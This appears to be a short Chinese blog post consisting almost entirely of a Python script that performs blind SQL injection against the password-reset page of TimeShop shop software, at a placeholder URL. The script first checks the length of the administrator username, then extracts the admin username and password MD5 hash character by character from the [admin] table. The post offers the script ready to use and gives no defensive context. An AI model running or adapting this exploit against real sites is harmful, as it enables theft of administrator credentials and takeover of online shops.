timeshop注入脚本

import requests

url = 'http://www.xxxx.com/profile.asp?action=repass&shop=1'

request = requests.session()

header = {

'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'

}
data = {

'username' : "1'and (select top 1 len(admin) from [admin])=8 and '1'='1",
'Submit' : "%C8%B7%26%23160%3B%B6%A8"

}

tmp = request.post(url,data=data,headers=header,timeout=5)

tmp.encoding = 'gb2312'

print(tmp.text)

if '密码提问' in tmp.text:

print('用户名长度是8')

else:

print('用户名长度不是5 要爆破一下用户名哦~')

users = []

payload = "1'or (select top 1 asc(mid(admin,{0},1)) from [admin])={1} and '1'='1"

for i in range(8):

for j in range(48,127):

user_data = {

'username' : payload.format(str(i+1),str(j)),

'Submit' : "%C8%B7%26%23160%3B%B6%A8"

}

tmp = request.post(url,data=user_data,headers=header,timeout=5)

tmp.encoding = 'gb2312'

if '密码提问' in tmp.text:

print(chr(j))

users.append(chr(j))

break

print('用户:'+''.join(str(i) for i in users))

payload = "1'and (select top 1 asc(mid(userpassword,{0},1)) from [admin])={1} and '1'='1"

passs = []
for i in range(16):

for j in range(48,127):
    pass_data = {
    'username' : payload.format(str(i+1),str(j)),
    'Submit' : "%C8%B7%26%23160%3B%B6%A8"
}
    tmp = request.post(url,data=pass_data,headers=header,timeout=50)
    tmp.encoding = 'gb2312'
    print(len(tmp.text))
    if '密码提问' in tmp.text:
        print(chr(j))
        passs.append(chr(j))
        break

print('密码MD5:'+''.join(str(i) for i in passs))

本文链接:

http://hentai6.cn/index.php/archives/37/
1 + 6 =
快来做第一个评论的人吧~